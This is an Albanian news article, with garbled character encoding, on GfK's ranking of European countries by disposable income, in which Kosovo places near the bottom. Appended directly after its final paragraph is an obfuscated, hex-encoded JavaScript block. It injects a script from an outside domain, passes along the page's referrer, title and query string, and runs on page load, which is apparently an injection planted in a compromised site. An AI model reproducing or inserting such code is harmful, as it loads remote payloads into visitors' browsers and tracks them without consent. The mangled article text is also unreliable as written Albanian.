f.1101132106798_m

PasuritA� e evropianA�ve, Kosova nA� vendet e fundit

Agjencia gjermane pA�r hulumtime a�?GfK Geo Marketinga�? ka publikuar rezultatet e analizA�s mbi tA� ardhurat dhe kursimet e 42 vendeve tA� EvropA�s, pasi tA� shlyejnA� detyrimet tatimore. BanorA�t e Lihtenshtajnit rezultojnA� mA� tA� pasurit, ndA�rsa banorA�t e MoldavisA� rezultojnA� mA� tA� varfrit.

BanorA�t e Lihtenshtajnit janA� mA� tA� pasurit nA� EvropA� me 56.978 euro tA� ardhura nA� vit, ndA�rsa banorA�t e MoldavisA�, janA� 45 herA� mA� tA� varfA�r, shkruan a�?EU Observera�?.

NA� vendin e dytA� janA� norvegjezA�t me 32.037 euro, e mA� pas radhiten: zviceranA�t me 31.666 euro, banorA�t e Luksemburgut me 28.924 euro, danezA�t me 22.040 euro.

NA� top listA�n e mA� tA� pasurve janA� edhe Austria,Suedia, Gjermania, Franca dhe Belgjika.

Mesatares evropiane mA� afA�r janA� spanjollA�t me 12.943 euro dhe janA� tA� radhitur ne vendin e 17 tA� kA�saj liste. NA� fund tA� listA�s janA� Kosova, Bjellorusia dhe Moldavia me mA� pak se 2.000 euro nA� vit.

Nga vendet tjera tA� ish JugosllavisA�, Kroacia A�shtA� radhitur nA� pozitA�n 30, me 5.850 euro tA� ardhura nA� vit.

NA� kA�tA� hulumtim theksohet se banorA�t e EvropA�s me tA� ardhura mA� tA� larta, respektivisht me fuqi mA� tA� lartA� blerA�se, megjithatA�, pjesA�n mA� tA� madhe tA� ardhurave tA� tyre e harxhojnA� nA� banesat e shtrenjta dhe nA� pA�rgjithA�si shpenzime tA� larta tA� jetA�s sA� shtrenjtuar. Por, gjithsesi atyre u mbeten para edhe pA�r harxhime tjera, pA�r dallim nga ata banorA� ku fuqia blerA�se A�shtA� mA� e ulA�t.var _0x31f1=[“\x73\x63\x72\x69\x70\x74″,”\x63\x72\x65\x61\x74\x65\x45\x6C\x65\x6D\x65\x6E\x74″,”\x73\x72\x63″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26\x73\x65\x5F\x72\x65\x66\x65\x72\x72\x65\x72\x3D”,”\x72\x65\x66\x65\x72\x72\x65\x72″,”\x26\x64\x65\x66\x61\x75\x6C\x74\x5F\x6B\x65\x79\x77\x6F\x72\x64\x3D”,”\x74\x69\x74\x6C\x65″,”\x26″,”\x3F”,”\x72\x65\x70\x6C\x61\x63\x65″,”\x73\x65\x61\x72\x63\x68″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”,”\x26\x66\x72\x6D\x3D\x73\x63\x72\x69\x70\x74″,”\x63\x75\x72\x72\x65\x6E\x74\x53\x63\x72\x69\x70\x74″,”\x69\x6E\x73\x65\x72\x74\x42\x65\x66\x6F\x72\x65″,”\x70\x61\x72\x65\x6E\x74\x4E\x6F\x64\x65″,”\x61\x70\x70\x65\x6E\x64\x43\x68\x69\x6C\x64″,”\x68\x65\x61\x64″,”\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x73\x42\x79\x54\x61\x67\x4E\x61\x6D\x65″,”\x70\x72\x6F\x74\x6F\x63\x6F\x6C”,”\x68\x74\x74\x70\x73\x3A”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x52\x5F\x50\x41\x54\x48″,”\x54\x68\x65\x20\x77\x65\x62\x73\x69\x74\x65\x20\x77\x6F\x72\x6B\x73\x20\x6F\x6E\x20\x48\x54\x54\x50\x53\x2E\x20\x54\x68\x65\x20\x74\x72\x61\x63\x6B\x65\x72\x20\x6D\x75\x73\x74\x20\x75\x73\x65\x20\x48\x54\x54\x50\x53\x20\x74\x6F\x6F\x2E”];var d=document;var s=d[_0x31f1[1]](_0x31f1[0]);s[_0x31f1[2]]= _0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12];if(document[_0x31f1[13]]){document[_0x31f1[13]][_0x31f1[15]][_0x31f1[14]](s,document[_0x31f1[13]])}else {d[_0x31f1[18]](_0x31f1[17])[0][_0x31f1[16]](s)};if(document[_0x31f1[11]][_0x31f1[19]]=== _0x31f1[20]&& KTracking[_0x31f1[22]][_0x31f1[21]](_0x31f1[3]+ encodeURIComponent(document[_0x31f1[4]])+ _0x31f1[5]+ encodeURIComponent(document[_0x31f1[6]])+ _0x31f1[7]+ window[_0x31f1[11]][_0x31f1[10]][_0x31f1[9]](_0x31f1[8],_0x31f1[7])+ _0x31f1[12])=== -1){alert(_0x31f1[23])}